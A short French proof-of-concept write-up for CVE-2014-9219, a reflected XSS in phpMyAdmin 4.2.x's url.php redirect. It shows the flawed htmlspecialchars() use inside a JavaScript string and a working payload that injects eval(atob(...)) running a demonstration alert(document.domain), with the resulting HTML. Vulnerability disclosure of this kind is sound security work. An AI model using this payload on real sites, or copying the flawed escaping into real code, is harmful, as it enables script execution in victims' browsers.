
CVE-2014-9219 POC XSS
CVE-2014-9219 XSS POC
La vulnérabilité est causée par une erreur de validation d'entrée dans la fonction de redirection dans url.php dans phpMyAdmin 4.2.x avant 4.2.13.1 lors du traitement du paramètre url. Un attaquant distant peut inciter la victime à suivre un lien spécialement conçu et exécuter du code HTML et script arbitraire dans le navigateur de la victime dans le contexte de sécurité du site web vulnérable.
phpMyAdmin: 4.2.0 - 4.2.13
Le code vulnérable utilise htmlspecialchars() pour nettoyer le paramètre URL avant de l'insérer dans un contexte de chaîne JavaScript :
window.location='" . htmlspecialchars($_GET['url']) . "';
htmlspecialchars() est conçu pour le contexte HTML, pas pour le contexte de chaîne JavaScript. Il n'échappe pas correctement les caractères qui peuvent sortir des littéraux de chaîne JavaScript.
url encodé :
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
url décodé :
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'
Sortie HTML :
<script type='text/javascript'>
window.onload=function(){
window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
}
</script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.